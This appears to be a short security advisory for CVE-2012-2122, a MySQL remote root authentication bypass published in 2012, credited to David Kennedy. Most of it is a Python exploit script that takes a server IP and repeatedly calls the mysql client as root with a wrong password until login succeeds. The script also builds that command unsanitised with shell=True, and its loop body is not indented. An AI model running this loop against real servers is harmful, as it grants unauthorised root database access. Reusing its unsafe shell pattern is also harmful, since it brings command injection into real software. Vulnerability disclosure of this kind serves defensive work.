MySQL Remote Root Authentication Bypass Exploit

Summary

MySQL Remote Root Authentication suffers from bypass vulnerability.

Credit:

The information has been provided by David Kennedy (ReL1K).


Details

Vulnerable Systems:
 * MySQL

import subprocess

ipaddr = raw_input(‘Enter the IP address of the mysql server: ‘)

while 1:
subprocess.Popen(‘mysql –host=%s -u root mysql –password=blah’ % (ipaddr), shell=True).wait()

CVE Information:
2012-2122

Disclosure Timeline:
Published: 2012-06-12

Categories: Exploits